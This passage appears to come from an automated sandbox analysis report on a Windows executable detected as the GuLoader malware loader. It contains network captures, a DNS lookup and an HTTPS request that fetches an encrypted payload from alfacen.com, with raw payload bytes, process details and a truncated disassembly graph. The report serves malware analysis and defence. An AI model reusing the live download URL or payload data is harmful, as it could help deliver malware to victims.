                                                            Oct 20, 2024 19:16:56.278743982 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.278917074 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.278943062 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.279066086 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.429131031 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.429214001 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.450164080 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.450248003 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.451704025 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.451767921 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.581526041 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.581617117 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.581753969 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.581753969 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.581773043 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.584146023 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.620882034 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.621105909 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.621690035 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.621766090 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.622195959 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.622267008 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.622946024 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.623018026 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.623905897 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.623975039 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.737299919 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.737384081 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.737530947 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.737591028 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.737965107 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.738022089 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.771053076 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.771131039 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.791899920 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.791976929 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.792059898 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.792109966 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.792860985 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.792912006 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.793685913 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.793735981 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.794164896 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.794219017 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.794358969 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.794416904 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.795128107 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.795181036 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.795277119 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.795325994 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.796266079 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.796324968 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.796912909 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.796972036 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.896306992 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.896359921 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.896398067 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.896413088 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.896441936 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.896466970 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.896532059 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.896581888 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.896599054 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.896646976 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.897063017 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.897121906 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.897270918 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.897325993 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.929117918 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.929219961 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.978035927 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.978118896 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.978137016 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.978190899 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.978213072 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.978266954 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.978298903 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.978346109 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.978353024 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.978375912 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.978389025 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:56.978416920 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:57.116553068 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:57.116588116 CEST44349974193.107.36.30192.168.2.5

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 20, 2024 19:16:54.636404037 CEST5782753192.168.2.51.1.1.1
                                                            Oct 20, 2024 19:16:54.742644072 CEST53578271.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 20, 2024 19:16:54.636404037 CEST192.168.2.51.1.1.10xf38aStandard query (0)alfacen.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 20, 2024 19:16:54.742644072 CEST1.1.1.1192.168.2.50xf38aNo error (0)alfacen.com193.107.36.30A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • alfacen.com

                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549974193.107.36.304435704C:\Users\user\Desktop\450707124374000811.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-20 17:16:55 UTC161OUTGET /GZgWeuQ77.bin HTTP/1.1
                                                            User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                            Host: alfacen.com
                                                            Cache-Control: no-cache
                                                            2024-10-20 17:16:56 UTC344INHTTP/1.1 200 OK
                                                            Date: Sun, 20 Oct 2024 17:16:56 GMT
                                                            Server: Apache
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Last-Modified: Fri, 18 Oct 2024 09:43:46 GMT
                                                            Accept-Ranges: bytes
                                                            Content-Length: 287296
                                                            Cache-Control: max-age=2592000
                                                            Expires: Tue, 19 Nov 2024 17:16:56 GMT
                                                            Vary: Accept-Encoding
                                                            Content-Type: application/octet-stream
                                                            2024-10-20 17:16:56 UTC7848INData Raw: cf c5 f8 ac f6 67 ef 06 07 f8 37 69 71 e5 d0 63 6e a7 11 60 13 f7 7c 32 98 d3 07 17 1b 04 21 a6 fc 61 21 db 82 0c 0c ba 46 57 13 cc dd 2f ce bd 43 43 ef 35 7d c0 fc 24 73 28 81 73 c3 a6 69 98 93 d8 f3 4e 6a c2 71 51 f0 c6 fc 07 f8 50 07 e1 0b f0 b4 20 98 33 d0 3c 0c 3c f2 a4 e0 52 c3 85 c1 ae f3 a8 58 8c e1 13 e9 10 56 32 c1 ed e1 41 3e 19 b6 c3 22 30 78 90 98 2a 46 7c d9 95 0d 4f 3b 89 7f d3 95 f3 70 38 31 fd 3c e2 2b b2 8e bc 0f f7 d6 61 4a 63 12 42 09 e3 2c 28 3e 2a 77 4f 82 c5 9d 08 51 bc d0 b0 72 ed cf 50 f3 4a 6b 0c 78 44 57 39 ba 8a 63 81 20 63 93 0c 8e af 85 cf c2 c3 fc a9 90 62 3a b3 59 2d 6c bb ab fb 54 6e f1 22 30 66 97 3e 79 56 a5 5d 1f 0f e0 07 14 f9 2b e4 82 f2 c7 a6 e9 67 80 9f d7 69 d9 c4 b0 37 47 52 0a c3 02 fa 36 c0 87 ea 25 2d 64 c9 a9
                                                            Data Ascii: g7iqcn`|2!a!FW/CC5}$s(siNjqQP 3<<RXV2A>"0x*F|O;p81<+aJcB,(>*wOQrPJkxDW9c cb:Y-lTn"0f>yV]+gi7GR6%-d
                                                            2024-10-20 17:16:56 UTC8000INData Raw: 2c ce e6 06 e5 82 20 0b 06 93 db cf 18 ec ae 54 43 ca 88 70 a9 e1 bd 58 e5 d6 65 bc 1a f3 16 f4 b1 18 b0 5e 0f 1e 81 12 d3 d6 45 64 95 b8 78 50 9a 84 4f ec 12 72 a7 b8 d9 43 9f 7d ed 3b 31 2d 84 94 cc d8 0f 9e 75 cc 7f 6e 99 13 d4 61 ab bf 51 51 00 90 3a 67 14 91 53 3f 30 ea 39 c1 5d 2e 99 e4 39 e9 f7 78 f3 82 4d ab bc d6 a3 0e cf 16 47 02 d9 a8 f3 b5 78 d7 5e 01 b1 6f 57 26 fe 1d 62 73 ed e4 cf 08 b8 72 39 4b 3f 68 9b f2 a4 8d c3 06 d5 95 39 23 02 ec cb c9 d4 84 3a af d1 04 ef a8 c4 c1 33 31 de c6 cb cb 34 6a 55 a7 4b 28 44 90 05 6c fe 05 65 ea 02 76 3f 23 6e 9b c6 46 36 75 8f b2 9d 7c 80 68 d4 91 08 59 44 65 88 d5 29 b6 64 6c bc eb f9 a1 a0 0d 6c e7 14 30 9e 46 02 b8 3d 38 e9 f5 f9 d8 86 c7 b7 9c 52 ab fc de bb 45 d8 e8 a4 d8 c5 ec 5f ac 38 a6 7b c8 b9
                                                            Data Ascii: , TCpXe^EdxPOrC};1-unaQQ:gS?09].9xMGx^oW&bsr9K?h9#:314jUK(Dlev?#nF6u|hYDe)dll0F=8RE_8{
                                                            2024-10-20 17:16:56 UTC8000INData Raw: f2 ae 50 c3 29 22 6c ae a8 6f 37 25 0d 97 21 ca be 06 82 75 8d 66 e2 1a 63 c8 9c 4b 53 cb 8a 10 07 98 93 a6 25 11 92 cf 18 3b c1 7e f3 b1 cd a0 68 80 66 4d 7b 18 3e 3f fc f1 c2 4f 9d f4 7c 7c e4 ac c7 a6 87 2d 89 32 c3 a3 e7 7b 2a 63 aa 92 54 f4 ee 25 ef bd b7 8b 93 0a f1 1a a7 7f 35 dd af 3e 49 88 c1 61 01 15 5c 7a 2a c1 b5 23 87 a9 f8 24 fc d0 fb 6f f9 7d 64 92 47 b4 5d 2f 0d 8c e6 ef 97 04 51 96 a1 7b 61 65 8a 0e 0e 37 b4 31 05 39 ce 21 a1 3b be df ee de e0 5d 9d a4 85 cd 7e 9d c3 41 64 89 9e f9 8e 86 1c 07 59 5e fc 16 87 4e 73 56 a9 45 21 e8 2e d7 d6 0d 45 bb 11 5c c1 bc 29 1b fb d3 72 49 bf 9d 6a f2 bf 3b 17 b3 ec 53 d2 be 1b fa 46 79 5c db 4a d9 88 e2 0f c0 4d bf f0 44 37 41 e0 0c fd 9b 00 c1 a9 f3 a7 ce 23 50 84 f3 01 0f 19 fd e3 59 1b c9 9a 3c 2e
                                                            Data Ascii: P)"lo7%!ufcKS%;~hfM{>?O||-2{*cT%5>Ia\z*#$o}dG]/Q{ae719!;]~AdY^NsVE!.E\)rIj;SFy\JMD7A#PY<.
                                                            2024-10-20 17:16:56 UTC8000INData Raw: be 2e 90 bd 4d eb 72 de b5 1f ad 1b 04 2a 4f 2a ff 04 2b 12 c9 51 c6 db d3 49 dd 45 c9 ef d4 d9 ff ba b4 72 7e c6 23 82 1d 92 0c 69 c5 d0 b3 78 98 45 59 bc 94 20 07 9d 45 6c db 31 0a 84 e4 52 ed 6d 61 ec 6a 79 94 94 13 73 cd 49 e5 92 34 27 c4 0a b7 a7 85 00 5d d5 b0 11 8b bb 43 e1 45 7f 4c 91 d5 39 8f 83 a2 df 3c 42 c6 83 80 6c bc 94 41 36 d0 3a fa d9 a9 ab 64 2f 90 f9 7d a2 bb 12 10 d6 9e 20 d4 92 00 b4 98 d9 5c 11 44 bd d7 10 3d 3a 46 e2 bc dc 2c 14 72 6a b7 69 65 db 21 79 e6 82 72 d1 3d e2 01 aa 75 15 9d 72 90 7b a2 68 56 40 ea 3b 26 1f 6e 6c 67 7c ae 32 d8 17 c3 e0 cc 06 06 ba 90 7a e3 98 47 44 05 c0 3f 49 3b 00 e6 f1 2b a4 29 3b dc c5 a6 6c f6 31 f2 a7 f0 94 76 b4 89 5d c9 02 0b 85 7e 30 b9 ad ad a1 26 68 1f 7a f5 72 33 cc 39 01 e1 a2 02 d8 31 72 da
                                                            Data Ascii: .Mr*O*+QIEr~#ixEY El1RmajysI4']CEL9<BlA6:d/} \D=:F,rjie!yr=ur{hV@;&nlg|2zGD?I;+);l1v]~0&hzr391r
                                                            2024-10-20 17:16:56 UTC8000INData Raw: 0a 80 72 67 3f 68 36 16 a7 4c c3 2f 6d e8 4c d4 20 df 61 28 af ab 85 7c 0f 45 30 70 7d f5 d8 d6 2b f7 f2 c7 f9 c0 4b d5 e1 ba 76 ea 7e 00 1b 5c 94 9d fe 8b 99 74 62 17 c2 68 aa 4c 0b a4 37 ac 2d 17 63 43 8c 6d 85 82 79 aa 49 84 2a 62 2e 1e bc 77 27 5c d8 ee 9a 3d 9e be f0 55 b1 bc de 25 04 a6 fe 3e 62 c9 70 21 be b6 a2 f8 ed 99 63 81 2b d0 7e ed 61 fe 0c 9f b0 23 a2 06 92 3f 7f 06 90 6c 3b 38 43 e3 97 96 a8 0f 92 e5 5b b3 cc 06 6b 68 37 17 53 0c 1b ef 2e ba c7 dc e6 90 c7 0b fc 34 b2 7e bf bd 7c 7e f8 ce b7 e9 ac c4 57 e5 d0 cb 1d a2 55 c6 0c ee a1 04 2c 14 cc 9b 10 c5 cc 94 bf 4c 6e 6b cf b0 64 6c 60 53 f7 ae 51 c8 80 c2 a7 76 db 03 8b ff fe 1b 0e a5 a0 0b 37 72 aa 83 cc 02 e0 0c d0 59 16 21 ff 6a 73 a4 bc 97 3a 77 53 eb 2f 51 0b 6a a1 fe 44 99 c7 72 8f
                                                            Data Ascii: rg?h6L/mL a(|E0p}+Kv~\tbhL7-cCmyI*b.w'\=U%>bp!c+~a#?l;8C[kh7S.4~|~WU,Lnkdl`SQv7rY!js:wS/QjDr
                                                            2024-10-20 17:16:56 UTC8000INData Raw: f6 eb eb 54 c2 dd 5d ad c6 8a 8d 4d a2 88 8a db 68 2b 3a 35 24 86 28 8e f8 cb b4 3d 77 ef 6f f0 8d cd 43 a6 19 bb ce 67 ad c6 e4 f7 c0 be 27 89 15 0c 6e eb 30 ba b2 18 8a d0 e8 05 ac 7e aa 93 93 5e df 2c 66 0c 4a f6 39 c3 02 a0 b9 86 4f 66 47 3f 13 45 da a8 78 6c d1 82 56 8a fc 70 e6 58 74 30 d2 56 17 24 8d bd 00 a1 62 33 82 84 7e 92 ad 25 77 00 b0 89 d4 1b dc 75 1f 13 75 c1 32 e6 88 0d 5d 96 23 61 08 71 b4 98 b9 7b d0 d4 d8 21 b6 21 3e 6b 32 c2 08 ee 28 cb 08 74 b3 f6 9e 54 ad 5b 1e 00 31 0e 26 4f dd 06 22 f3 4a a7 84 64 a1 46 15 35 45 02 89 6b 22 58 ad 13 5a 51 4d ca 86 12 09 db 77 f1 04 fe 32 76 49 cd cf 79 76 4d cd 6f c9 c8 31 76 92 c1 49 32 4d 05 b9 26 55 83 70 e7 bc e7 75 33 53 a1 da d8 03 a1 31 57 c8 3c 28 23 62 75 22 90 a0 61 f8 13 29 09 ae b8 8b
                                                            Data Ascii: T]Mh+:5$(=woCg'n0~^,fJ9OfG?ExlVpXt0V$b3~%wuu2]#aq{!!>k2(tT[1&O"JdF5Ek"XZQMw2vIyvMo1vI2M&Upu3S1W<(#bu"a)
                                                            2024-10-20 17:16:56 UTC8000INData Raw: 8d 1b 25 c3 75 d9 7d a0 e8 73 64 cc d7 33 b7 9c 88 90 32 d3 4b 6b 81 9b 73 08 d7 92 1d b8 b2 09 54 fa 3c c4 aa bb f3 cf d4 16 b4 70 61 0e 2e df 2a d4 b6 1b 2b 3e d3 0b 77 69 17 2d 79 20 22 b2 77 23 c4 d3 8f 6a 9b 63 ce c3 a3 de 1a 5a 93 4c 6a 3b 01 14 98 e3 fa 38 e2 cc 53 dc 83 94 24 0f d8 5c 85 f3 73 6b ec ca bb 03 61 ce 77 f6 9b f0 d9 02 61 aa e1 bd 1d 82 9b 28 a5 5c 98 2d a7 c6 e4 ed 2b f2 8d 5d 22 0b 0d d9 b4 f8 26 99 0e bc 13 d6 51 f4 4f f8 4c e5 ca 23 54 a1 f7 57 a7 7d da d8 a3 fb 60 cf 1b 27 ab 0b a9 f9 69 1e 77 20 04 d5 21 93 42 18 1e fc 78 f4 eb 98 30 3e 1e 99 b8 9b 3c ea 6d 0c b2 d9 80 38 04 91 1f 80 2f 3b 5c 2e 23 ba cf b9 ff eb 5d 11 fb c1 30 fb db ec cd b5 12 51 b5 0a 43 9a 69 1f 5e a8 30 ec b2 04 c4 55 f7 7a 14 39 0f eb 7f bc 75 fe ed 94 cc
                                                            Data Ascii: %u}sd32KksT<pa.*+>wi-y "w#jcZLj;8S$\skawa(\-+]"&QOL#TW}`'iw !Bx0><m8/;\.#]0QCi^0Uz9u
                                                            2024-10-20 17:16:56 UTC8000INData Raw: 6d f9 e9 e8 0e d0 bd 12 4c 17 9a e6 f1 c5 6f 85 9b 86 c5 60 37 58 6a c8 42 9c 66 50 c6 52 d6 67 1d 63 ee 40 69 f3 cd 38 14 5a 43 5c d0 59 84 ef f7 7d a5 51 31 f1 52 f6 f5 f5 70 26 06 11 92 94 19 b0 bd 4e 99 c5 33 49 29 70 e9 24 40 50 2f 13 62 b3 0e 68 56 be 1b d0 62 76 47 b4 47 e3 a6 3f 7d a8 21 bb 9f 37 e2 90 15 b6 5c c0 a8 c7 48 85 9e ec a0 91 93 6b 73 82 1a 81 ca 6f 42 1a a3 60 bc 63 b9 45 24 df 06 43 3f 7a d5 9f e5 a9 cc 2b 6b f7 66 ca de 62 25 d2 9b 44 fb 86 d2 9e f1 99 84 8a d9 16 68 32 63 d4 0a 6c 99 a3 c5 0f 70 dd 68 98 ef f4 d3 e5 62 9a 8e 7e 62 b7 93 f3 c4 f2 e4 2f e5 94 56 bd 02 19 1d 0b 79 51 81 2d 45 32 7f 86 5a e0 af d9 c9 08 a3 15 d7 89 48 fe 02 0e 7a 53 cc ed 64 06 19 bd ff 5a 50 04 76 0d 5b 57 e6 51 91 36 8b 44 c2 64 e1 02 f2 d4 ad 80 d8
                                                            Data Ascii: mLo`7XjBfPRgc@i8ZC\Y}Q1Rp&N3I)p$@P/bhVbvGG?}!7\HksoB`cE$C?z+kfb%Dh2clphb~b/VyQ-E2ZHzSdZPv[WQ6Dd
                                                            2024-10-20 17:16:56 UTC8000INData Raw: 39 0c 3a 49 2d bf e3 98 2e 53 96 bc 7a 9e fa 61 6f 7e 06 21 a8 17 5b c0 f2 68 b0 0b 7f 4a 42 91 5d 9f ce 92 4c 53 a5 87 d8 dd 97 50 45 ae 22 a6 1c e3 eb c6 19 47 1a 1b 04 b6 f7 49 66 6b 1e 75 5b 6f f0 5b 5a bf 59 45 ac 93 28 83 a1 3b 99 a6 f7 52 68 cd 6d a6 81 6b 65 fe f8 2a f7 0a eb 16 5d 05 04 d1 62 ea b2 e3 21 71 12 25 73 40 36 65 66 3f d4 c4 0a 3b 03 62 51 5a 1a a7 95 ad f3 41 b3 25 fe 49 3e 37 ce 57 24 60 6c 88 d4 04 45 47 87 b2 3e 46 64 50 66 a9 6e 85 b9 b8 0b 6d c1 d0 51 d7 22 24 85 96 53 c9 5f 4f fb ca 65 de 48 6d a7 fd 60 0d c8 34 29 e3 fa ff e3 6d 23 30 f1 99 e3 32 fa 53 0b d1 30 fe a5 e6 34 d9 5b e5 22 af 61 3a 2c 4b 9b 75 16 0d a5 f0 e6 a1 76 77 1d 0d 55 3b 5a 37 0f 64 4c 0c fe 69 21 86 f3 f8 d7 ba 59 b6 28 6a 69 f7 78 77 45 cc 2c 00 b0 20 cf
                                                            Data Ascii: 9:I-.Szao~![hJB]LSPE"GIfku[o[ZYE(;Rhmke*]b!q%s@6ef?;bQZA%I>7W$`lEG>FdPfnmQ"$S_OeHm`4)m#02S04["a:,KuvwU;Z7dLi!Y(jixwE,
                                                            2024-10-20 17:16:56 UTC8000INData Raw: 24 a1 db 4f 33 ad d2 2b 96 43 f0 76 43 1e 75 f2 5b 04 6a 74 69 e4 4b fe 40 06 b2 a5 98 21 bb 37 d4 b4 a7 0b 8d d7 97 79 e9 15 fd 26 0f 15 96 d8 96 c9 41 9f 83 29 5f 3b 9e 04 e0 03 15 c5 4a 4b 45 0b e2 47 db 11 22 24 b1 84 f1 db 9f 4a 05 97 d9 be 9d 64 d6 e3 8b 0a a6 2f a8 0a 3d 02 43 15 4b 51 e2 d0 ee d7 03 da f0 87 06 09 f9 b2 4f be 09 95 7b 8c 4f b4 26 f1 09 3f d8 e7 2e 13 f0 17 31 6c ee c6 93 02 ce bb c1 63 23 bc c1 77 67 4b dd 31 11 5f 48 a8 33 55 4e 4e bb d2 18 93 84 72 d3 d2 ae 40 50 b1 c4 11 a4 d2 eb 71 1d f7 b1 82 cb 87 58 ca 27 95 45 ff c6 46 46 bf c2 fc 95 09 ca 52 ae 78 08 cb 45 0a 40 9b 03 42 c3 1a de 56 cf 73 0e cf 66 d3 2b 10 a4 eb 56 e9 f1 92 8e 74 eb 44 9e bd 37 68 bd 12 d7 d4 a9 9a 19 3b 5e cb 2a fa 7e f0 4f 70 72 8d 7e 2a 67 8a 69 18 8b
                                                            Data Ascii: $O3+CvCu[jtiK@!7y&A)_;JKEG"$Jd/=CKQO{O&?.1lc#wgK1_H3UNNr@PqX'EFFRxE@BVsf+VtD7h;^*~Opr~*gi


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:13:15:19
                                                            Start date:20/10/2024
                                                            Path:C:\Users\user\Desktop\450707124374000811.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\450707124374000811.exe"
                                                            Imagebase:0x400000
                                                            File size:1'001'467 bytes
                                                            MD5 hash:22AEAB62009AAA9073B3159D7DA1195E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2851812607.0000000002C18000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:13:16:43
                                                            Start date:20/10/2024
                                                            Path:C:\Users\user\Desktop\450707124374000811.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\450707124374000811.exe"
                                                            Imagebase:0x400000
                                                            File size:1'001'467 bytes
                                                            MD5 hash:22AEAB62009AAA9073B3159D7DA1195E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:22.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:19.6%
                                                              Total number of Nodes:1542
                                                              Total number of Limit Nodes:46
                                                              execution_graph 4933 10001000 4936 1000101b 4933->4936 4943 10001516 4936->4943 4938 10001020 4939 10001027 GlobalAlloc 4938->4939 4940 10001024 4938->4940 4939->4940 4941 1000153d 3 API calls 4940->4941 4942 10001019 4941->4942 4945 1000151c 4943->4945 4944 10001522 4944->4938 4945->4944 4946 1000152e GlobalFree 4945->4946 4946->4938 3893 401941 3894 401943 3893->3894 3895 402c37 17 API calls 3894->3895 3896 401948 3895->3896 3899 405990 3896->3899 3938 405c5b 3899->3938 3902 4059b8 DeleteFileW 3904 401951 3902->3904 3903 4059cf 3905 405aef 3903->3905 3952 406282 lstrcpynW 3903->3952 3905->3904 3970 4065c5 FindFirstFileW 3905->3970 3907 4059f5 3908 405a08 3907->3908 3909 4059fb lstrcatW 3907->3909 3953 405b9f lstrlenW 3908->3953 3910 405a0e 3909->3910 3913 405a1e lstrcatW 3910->3913 3915 405a29 lstrlenW FindFirstFileW 3910->3915 3913->3915 3915->3905 3923 405a4b 3915->3923 3916 405b18 3973 405b53 lstrlenW CharPrevW 3916->3973 3919 405ad2 FindNextFileW 3919->3923 3924 405ae8 FindClose 3919->3924 3920 405948 5 API calls 3922 405b2a 3920->3922 3925 405b44 3922->3925 3926 405b2e 3922->3926 3923->3919 3932 405a93 3923->3932 3957 406282 lstrcpynW 3923->3957 3924->3905 3928 4052e6 24 API calls 3925->3928 3926->3904 3929 4052e6 24 API calls 3926->3929 3928->3904 3931 405b3b 3929->3931 3930 405990 60 API calls 3930->3932 3934 406048 36 API calls 3931->3934 3932->3919 3932->3930 3933 4052e6 24 API calls 3932->3933 3936 4052e6 24 API calls 3932->3936 3958 405948 3932->3958 3966 406048 MoveFileExW 3932->3966 3933->3919 3935 405b42 3934->3935 3935->3904 3936->3932 3976 406282 lstrcpynW 3938->3976 3940 405c6c 3977 405bfe CharNextW CharNextW 3940->3977 3943 4059b0 3943->3902 3943->3903 3944 406516 5 API calls 3950 405c82 3944->3950 3945 405cb3 lstrlenW 3946 405cbe 3945->3946 3945->3950 3947 405b53 3 API calls 3946->3947 3949 405cc3 GetFileAttributesW 3947->3949 3948 4065c5 2 API calls 3948->3950 3949->3943 3950->3943 3950->3945 3950->3948 3951 405b9f 2 API calls 3950->3951 3951->3945 3952->3907 3954 405bad 3953->3954 3955 405bb3 CharPrevW 3954->3955 3956 405bbf 3954->3956 3955->3954 3955->3956 3956->3910 3957->3923 3983 405d4f GetFileAttributesW 3958->3983 3961 405975 3961->3932 3962 405963 RemoveDirectoryW 3964 405971 3962->3964 3963 40596b DeleteFileW 3963->3964 3964->3961 3965 405981 SetFileAttributesW 3964->3965 3965->3961 3967 406069 3966->3967 3968 40605c 3966->3968 3967->3932 3986 405ece 3968->3986 3971 4065db FindClose 3970->3971 3972 405b14 3970->3972 3971->3972 3972->3904 3972->3916 3974 405b1e 3973->3974 3975 405b6f lstrcatW 3973->3975 3974->3920 3975->3974 3976->3940 3978 405c1b 3977->3978 3982 405c2d 3977->3982 3979 405c28 CharNextW 3978->3979 3978->3982 3980 405c51 3979->3980 3980->3943 3980->3944 3981 405b80 CharNextW 3981->3982 3982->3980 3982->3981 3984 405d61 SetFileAttributesW 3983->3984 3985 405954 3983->3985 3984->3985 3985->3961 3985->3962 3985->3963 3987 405f24 GetShortPathNameW 3986->3987 3988 405efe 3986->3988 3989 406043 3987->3989 3990 405f39 3987->3990 4013 405d74 GetFileAttributesW CreateFileW 3988->4013 3989->3967 3990->3989 3992 405f41 wsprintfA 3990->3992 3994 4062a4 17 API calls 3992->3994 3993 405f08 CloseHandle GetShortPathNameW 3993->3989 3995 405f1c 3993->3995 3996 405f69 3994->3996 3995->3987 3995->3989 4014 